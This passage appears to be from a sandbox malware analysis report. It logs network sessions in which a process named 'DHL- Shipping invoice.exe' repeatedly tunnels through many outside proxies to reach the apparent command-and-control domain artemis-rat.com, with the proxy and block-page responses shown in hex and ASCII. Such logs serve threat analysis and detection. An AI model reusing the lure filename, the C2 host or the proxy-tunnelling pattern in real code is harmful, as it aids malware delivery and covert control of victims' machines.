                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            357192.168.2.4512954.236.183.3780806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.243680000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            358192.168.2.45117551.15.242.20288886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.252860069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            359192.168.2.451123103.146.137.7310816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.255872965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            360192.168.2.45130138.162.25.16431286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.257361889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.560034037 CET111INHTTP/1.1 407 Proxy Authentication Required
                            Proxy-Authenticate: Basic realm=""
                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                            Data Ascii: Proxy Authentication Required


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            361192.168.2.451331104.24.236.203806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.259294987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.346868038 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            362192.168.2.45107639.100.82.18888886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.259572029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.561000109 CET767INHTTP/1.1 403 Forbidden
                            Server: Beaver
                            Cache-Control: no-cache
                            Content-Type: text/html
                            Content-Length: 635
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                            Mar 12, 2024 08:37:00.565337896 CET767INHTTP/1.1 403 Forbidden
                            Server: Beaver
                            Cache-Control: no-cache
                            Content-Type: text/html
                            Content-Length: 635
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            363192.168.2.450984222.138.76.690026484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.259923935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.573345900 CET311INHTTP/1.1 400 Bad Request
                            Server: nginx
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 166
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            364192.168.2.45129934.135.203.17231286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.305300951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.739197969 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            365192.168.2.451065159.223.71.71618186484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.449898005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            366192.168.2.45124015.236.106.23631286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.467428923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.630054951 CET116INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Server: nginx
                            Content-Type: text/plain
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            367192.168.2.4513483.21.101.15831286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.468209028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.572115898 CET116INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Server: nginx
                            Content-Type: text/plain
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            368192.168.2.45114815.207.35.24110806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.468436956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.751976967 CET116INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Server: nginx
                            Content-Type: text/plain
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            369192.168.2.451082102.132.54.6280806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.468667984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            370192.168.2.451077216.10.242.18306706484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.468908072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            371192.168.2.451047119.46.68.228806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.469351053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.831892014 CET1286INHTTP/1.1 403 Forbidden
                            Content-Type: text/html
                            Server: Zscaler/6.2
                            Cache-Control: no-cache
                            Access-Control-Allow-Origin: *
                            Content-length: 13596
                            Data Raw: 3c 21 2d 2d 23 20 49 64 3a 20 63 6c 6f 73 65 64 70 72 6f 78 79 2e 68 74 6d 6c 20 32 38 35 31 34 34 20 32 30 32 31 2d 30 36 2d 31 36 20 30 35 3a 30 32 3a 30 36 5a 20 73 7a 68 61 6e 67 20 2d 2d 3e 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 63 2e 6f 72 67 2f 54 52 2f 31 39 39 39 2f 52 45 43 2d 68 74 6d 6c 34 30 31 2d 31 39 39 39 31 32 32 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 5a 73 63 61 6c 65 72 20 6d 61 6b 65 73 20 74 68 65 20 69 6e 74 65 72 6e 65 74 20 73 61 66 65 20 66 6f 72 20 62 75 73 69 6e 65 73 73 65 73 20 62 79 20 70 72 6f 74 65 63 74 69 6e 67 20 74 68 65 69 72 20 65 6d 70 6c 6f 79 65 65 73 20 66 72 6f 6d 20 6d 61 6c 77 61 72 65 2c 20 76 69 72 75 73 65 73 2c 20 61 6e 64 20 6f 74 68 65 72 20 73 65 63 75 72 69 74 79 20 74 68 72 65 61 74 73 2e 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 74 69 74 6c 65 3e 49 6e 74 65 72 6e 65 74 20 53 65 63 75 72 69 74 79 20 62 79 20 5a 73 63 61 6c 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 76 61 72 20 64 65 66 4c 61 6e 67 20 3d 20 27 65 6e 5f 55 53 27 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 3c 69 6d 67 20 61 6c 74 3d 22 5a 73 63 61 6c 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 7a 73 63 61 6c 65 72 2e 6e 65 74 2f 69 6d 67 5f 6c 6f 67 6f 5f 6e 65 77 31 2e 70 6e 67 22 3e 2d 2d 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 33 65 33 65 33 3b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 0a 63 6f 6c 6f 72 3a 23 34 42 34 46 35 34 3b 0a 7d 0a 61 20 7b 0a 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 0a 63 6f 6c 6f 72 3a 23 30 30 39 64 64 30 3b 0a 7d 0a 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 0a 7d 0a 74 64 20 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 7d 0a 69 6d 67 20 7b 0a 6d 61 78 2d 68 65 69 67 68 74 3a 37 35 70 78 3b 0a 6d 61 78 2d 77 69 64 74 68 3a 34 33 30 70 78 3b 0a 7d 0a 2e 70 67 20 7b 0a 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 0a 74 6f 70 3a 30 3b 0a 62 6f 74 74 6f 6d 3a 30 3b 0a 6c 65 66 74 3a 30 3b 0a 72 69 67 68 74 3a 30 3b 0a 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 3b 0a 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 0a 7d 0a 2e 70 67 3a 62 65 66 6f 72 65 20 7b 0a 63 6f 6e 74 65 6e 74 3a 22 22 3b 0a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 68 65 69 67 68
                            Data Ascii: ...# Id: closedproxy.html 285144 2021-06-16 05:02:06Z szhang --><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"><html><head><meta name="description" content="Zscaler makes the internet safe for businesses by protecting their employees from malware, viruses, and other security threats."><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Internet Security by Zscaler</title><script language="JavaScript">var defLang = 'en_US'</script>...<img alt="Zscaler" src="https://login.zscaler.net/img_logo_new1.png">--><style type="text/css">body {background-color:#e3e3e3;font-family:Arial, sans-serif;font-size:12px;color:#4B4F54;}a {cursor:pointer;text-decoration:none;color:#009dd0;}table {margin-top:10px;}td table {margin-top:0;text-align:center;}img {max-height:75px;max-width:430px;}.pg {position:absolute;top:0;bottom:0;left:0;right:0;overflow-x:hidden;white-space:nowrap;}.pg:before {content:"";display:inline-block;heigh
                            Mar 12, 2024 08:37:00.831908941 CET1286INData Raw: 74 3a 31 30 30 25 3b 0a 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 0a 7d 0a 2e 70 67 5f 63 6f 6e 74 20 7b 0a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d
                            Data Ascii: t:100%;vertical-align:middle;}.pg_cont {display:inline-block;vertical-align:middle;width:100%;position:relative;}.a_i {width:19px;height:19px;margin-right:10px;background-size: 19px 19px;display:inline-block;}.m_tbl {width:100
                            Mar 12, 2024 08:37:01.191890001 CET1286INData Raw: 69 6d 61 67 65 3a 20 75 72 6c 28 27 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 47 51 41 41 41 42 6b 43 41 59 41 41 41 42 77 34 70 56 55 41 41 41 46
                            Data Ascii: image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAGQAAABkCAYAAABw4pVUAAAFgUlEQVR4nO2dOWxcVRSGP0+wWWKSiC1WMAV7SAI0bBLBLBI0bEUSyiSAFCOgYLMpEBA3JCEUCISQEBIIKtIgpaCho6KhAglkCQlRRBAhKBIQW4Di5iHH+M28c+85955h7leO5y6eb972v/PuQKVSqQwNY5+8V3oKY
                            Mar 12, 2024 08:37:01.191905022 CET1286INData Raw: 46 6a 49 42 66 45 56 59 6b 2f 66 37 6a 6d 32 6d 67 62 76 4d 5a 72 51 79 54 61 54 79 56 6d 77 48 4d 51 73 70 72 77 47 2b 78 74 65 7a 48 5a 37 34 6a 76 42 6c 2f 56 6e 61 4d 48 59 68 35 54 6d 71 6a 48 34 6b 52 53 70 53 49 52 73 49 31 65 53 56 2f 6b
                            Data Ascii: FjIBfEVYk/f7jm2mgbvMZrQyTaTyVmwHMQsprwG+xtezHZ74jvBl/VnaMHYh5TmqjH4kRSpSIRsI1eSV/kRHKlIhe8l7kBxWoiMViZBNwMMxg4woUZGKRMg+4ftHnahIpetp7wzlVzv4CTgMHO/4/kngfmCd1YQ60EQqn3Zt0EWIRRWJlL+Am4Evhe22AJ/rT0fEQcIXutNjdV12QduAG1NmpMA3yGUAfAF8qzsVMaJIZZCQcWy
                            Mar 12, 2024 08:37:01.191924095 CET1286INData Raw: 78 34 4f 6e 68 74 63 47 31 6c 64 47 45 67 65 47 31 73 62 6e 4d 36 65 44 30 69 59 57 52 76 59 6d 55 36 62 6e 4d 36 62 57 56 30 59 53 38 69 49 48 67 36 65 47 31 77 64 47 73 39 49 6b 46 6b 62 32 4a 6c 49 46 68 4e 55 43 42 44 62 33 4a 6c 49 44 55 75
                            Data Ascii: x4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuNi1jMTExIDc5LjE1ODMyNSwgMjAxNS8wOS8xMC0wMToxMDoyMCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZ
